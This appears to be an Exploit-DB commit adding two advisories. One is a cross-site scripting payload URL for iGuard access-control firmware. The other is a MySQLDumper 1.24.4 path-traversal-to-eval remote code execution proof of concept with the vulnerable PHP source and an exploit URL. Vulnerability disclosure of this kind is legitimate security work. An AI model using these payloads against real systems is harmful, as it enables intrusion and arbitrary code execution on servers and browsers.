DB: 2015-05-29

2 new exploits
This commit is contained in:
Offensive Security 2015-05-29 05:02:13 +00:00
parent c2a15a0750
commit 3f78695204
3 changed files with 92 additions and 0 deletions

View file

@ -33513,3 +33513,5 @@ id,file,description,date,author,platform,type,port
37131,platforms/php/webapps/37131.txt,"MySQLDumper 1.24.4 main.php Multiple Function CSRF",2012-04-27,AkaStep,php,webapps,0
37132,platforms/php/webapps/37132.txt,"WordPress Plugin Free Counter 1.1 Stored XSS",2015-05-27,"Panagiotis Vagenas",php,webapps,80
37133,platforms/php/webapps/37133.txt,"MySQLDumper 1.24.4 index.php page Parameter XSS",2012-04-27,AkaStep,php,webapps,0
37134,platforms/php/webapps/37134.php,"MySQLDumper 1.24.4 'menu.php' Remote PHP Code Execution Vulnerability",2012-04-27,AkaStep,php,webapps,0
37135,platforms/hardware/webapps/37135.txt,"iGuard Security Access Control Device Firmware 3.6.7427A Cross Site Scripting Vulnerability",2012-05-02,"Usman Saeed",hardware,webapps,0

Can't render this file because it is too large.

View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/53355/info
iGuard Security Access Control is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input in the embedded web server.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/></font><IFRAME SRC="JAVASCRIPT:alert('XSS Found by Usman Saeed , Xc0re Security Research Group');">.asp

83
platforms/php/webapps/37134.php Executable file
View file

@ -0,0 +1,83 @@
source: http://www.securityfocus.com/bid/53310/info
MySQLDumper is prone to a vulnerability that lets remote attackers execute arbitrary code because the application fails to sanitize user-supplied input.
Attackers can exploit this issue to execute arbitrary PHP code within the context of the affected webserver process.
MySQLDumper 1.24.4 is vulnerable; other versions may also be affected.
Vulnerable code section:
/*
//menu.php
if (isset($_POST['selected_config'])||isset($_GET['config']))
{
if (isset($_POST['selected_config'])) $new_config=$_POST['selected_config'];
// Configuration was switched in content frame?
if (isset($_GET['config'])) $new_config=$_GET['config'];
// restore the last active menuitem
if (is_readable($config['paths']['config'].$new_config.'.php'))
{
clearstatcache();
unset($databases);
$databases=array();
if (read_config($new_config))
{
$config['config_file']=$new_config;
$_SESSION['config_file']=$new_config; //$config['config_file'];
$config_refresh='
<script language="JavaScript" type="text/javascript">
if (parent.MySQL_Dumper_content.location.href.indexOf("config_overview.php")!=-1)
{
var selected_div=parent.MySQL_Dumper_content.document.getElementById("sel").value;
}
else selected_div=\'\';
parent.MySQL_Dumper_content.location.href=\'config_overview.php?config='.urlencode($new_config).'&sel=\'+selected_div</script>';
}
if (isset($_GET['config'])) $config_refresh=''; //Neu-Aufruf bei Uebergabe aus Content-Bereich verhindern
}
}
*/
As you can see we can traverse it +
if we will look to read_config() function
//inc/functions_global.php
function read_config($file=false)
{
global $config,$databases;
$ret=false;
if (!$file) $file=$config['config_file'];
// protect from including external files
$search=array(':', 'http', 'ftp', ' ');
$replace=array('', '', '', '');
$file=str_replace($search,$replace,$file);
if (is_readable($config['paths']['config'].$file.'.php'))
{
// to prevent modern server from caching the new configuration we need to evaluate it this way
clearstatcache();
$f=implode('',file($config['paths']['config'].$file.'.php'));
$f=str_replace('<?php','',$f);
$f=str_replace('?>','',$f);
eval($f);
$config['config_file']=$file;
$_SESSION['config_file']=$config['config_file'];
$ret=true;
}
return $ret;
}
this means remote attacker can iterate his/her code as PHP.(Notice: eval($f))
Our exploit:
http://www.example.com/learn/cubemail/menu.php?config=../../ss
where ss = ss.php
#cat ss.php # in eg attacker uploaded his/her own file:
echo 'Our command executed ' . getcwd();
phpinfo();